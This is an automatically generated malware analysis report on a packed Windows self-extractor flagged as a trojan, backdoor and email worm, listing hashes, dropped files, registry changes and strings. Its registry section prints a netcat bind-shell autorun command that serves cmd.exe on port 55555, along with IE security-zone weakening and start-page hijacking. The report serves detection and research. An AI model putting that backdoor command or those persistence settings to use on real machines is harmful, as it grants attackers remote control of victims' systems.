HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.FAkeAlert.105 (AdAware), Backdoor.Win32.PcClient.FD, RemoteAdmin.Win32.NetCat.FD, SpyTool.Win32.Ardamax.FD, GenericEmailWorm.YR, RemoteAdminNetCat.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor, RemoteAdmin, Worm, EmailWorm, SpyTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 1d23a57973153cdfb24c05c9c3c5e2f4
SHA1: 70708f86e80f2a26b522354769afb945fec8935a
SHA256: e7999726d14f963e988cc6211138ec70cf084d0ebd4e2f0b7e9aa32c94e38c20
SSDeep: 49152:1MSFFNLrUrfcnwFC4K2 vwJKcNMwAbfpH9Ou8N:ySfNLrUQnl12uYww8Oh
Size: 1906688 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Kevin Solway
Created at: 2008-04-13 21:32:45
Analyzed on: WindowsXP SP3 32-bit
Summary: RemoteAdmin. A system tool used to allow remote access or control of computer systems.
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
EmailWorm | Worm can send e-mails. |
Process activity
The RemoteAdmin creates the following process(es):
nc.exe:1932
%original file name%.exe:580
virus.exe:1224
regedit.exe:972
The RemoteAdmin injects its code into the following process(es):
ALW.exe:1160
rundll32.exe:1532
File activity
The process %original file name%.exe:580 makes changes in the file system.
The RemoteAdmin creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\nc.exe (2025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\foto.jpg (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\wsetup.cmd (966 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\virus.exe (33520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\INDEXH~1.TXT (122 bytes)
The process virus.exe:1224 makes changes in the file system.
The RemoteAdmin creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.01 (82 bytes)
%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.00 (2 bytes)
%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.exe (15021 bytes)
%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.02 (57 bytes)
Registry activity
The process nc.exe:1932 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 2C 14 48 BA 2A 49 22 43 BB E9 C6 A9 A7 D1 F8"
The process ALW.exe:1160 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 AE 10 72 B9 94 99 59 34 40 69 8C 05 6E 3B 66"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
To run itself automatically each time Windows boots, the RemoteAdmin adds a link to its file under the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ALW Start" = "%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.exe"
The process %original file name%.exe:580 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 CF 8E BC 38 29 58 01 76 B3 89 D7 E9 08 6E 36"
To run itself automatically each time Windows boots, the RemoteAdmin adds a link to its file under the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"
The process virus.exe:1224 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 08 85 B2 97 72 FA E1 C8 65 20 9A 2F F2 CA 5B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\All Users\Application Data\ITKVAP]
"ALW.exe" = "ALW"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The RemoteAdmin modifies the IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The RemoteAdmin modifies the IE security zone settings so that all local hosts with no dots in their name that are not assigned to any other zone are mapped to the Intranet Zone:
"UNCAsIntranet" = "1"
The RemoteAdmin modifies the IE security zone settings so that all hosts that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
The process regedit.exe:972 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB BD 4D 05 69 23 3B AA 1D FB FB 29 40 F8 7E E8"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "c:\windows\system32\index1.html"
To run itself automatically each time Windows boots, the RemoteAdmin adds a link to its file under the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Update" = "c:\windows\system32\nc.exe -d -L -p 55555 -e cmd.exe"
"Virus" = "c:\windows\system32\virus.exe andrescruzvtj@hotmail.com"
The process rundll32.exe:1532 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C 61 02 5C 4F 7A F7 C2 27 B2 B6 74 ED 4C FC F2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
MD5 | File path |
---|---|
1c902448ba8c2385602c8f5315f35204 | c:\Documents and Settings\All Users\Application Data\ITKVAP\ALW.01 |
d92e93f974e833bb6b9cae597fcf8a49 | c:\Documents and Settings\All Users\Application Data\ITKVAP\ALW.02 |
bb251a9f308d046931dcba40fb1e0450 | c:\Documents and Settings\All Users\Application Data\ITKVAP\ALW.exe |
e0fb946c00b140693e3cf5de258c22a1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\IXP000.TMP\nc.exe |
6fbb7d7530f7362b5495006fc5bb7909 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\IXP000.TMP\virus.exe |
e0fb946c00b140693e3cf5de258c22a1 | c:\WINDOWS\system32\nc.exe |
6fbb7d7530f7362b5495006fc5bb7909 | c:\WINDOWS\system32\virus.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Static Analysis
VersionInfo
Company Name: Microsoft Corporation
Product Name: HD Player
Product Version: 6.00.2900.5512
Legal Copyright: (c) Microsoft Corporation. Reservados todos los derechos.
Legal Trademarks:
Original Filename: WEXTRACT.EXE
Internal Name: Wextract
File Version: 6.00.2900.5512 (xpsp.080413-2105)
File Description: Win32 Cabinet Self-Extractor
Comments:
Language: Spanish (Spain, International Sort)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 39368 | 39424 | 4.5598 | 25b5d82208cedbbbc7ee430a4202819c |
.data | 45056 | 7140 | 1024 | 2.94449 | 99858e86526942a66950c7139f78a725 |
.rsrc | 53248 | 1867776 | 1865216 | 5.5405 | 012b992d76feb456da9e4e33b0ff74f1 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Map
The RemoteAdmin connects to the servers at the following location(s):
Strings from Dumps
<appro></appro></pre><pre>6-9'6-9'</pre><pre>$6.:$6.:</pre><pre>*?#1*?#1</pre><pre>>8$4,8$4,</pre><pre>AES for x86, CRYPTOGAMS by <appro></appro></pre><pre>Camellia for x86 by <appro></appro></pre><pre>RC4 for x86, CRYPTOGAMS by <appro></appro></pre><pre>FRegDeleteKeyExW</pre><pre>MARGIN-BOTTOM: 11px; BORDER-STYLE: solid; BORDER-COLOR: #DFDFE5; BORDER-WIDTH: 2px; BACKGROUND-COLOR: #DFDFE5; }H2 { COLOR: black; BACKGROUND-COLOR: #FFFFF; FONT-SIZE: 12pt; FONT-WEIGHT: normal; MARGIN-BOTTOM: 0px; MARGIN-TOP: 10px;}</pre></pre></p%C></pre></q3></pre>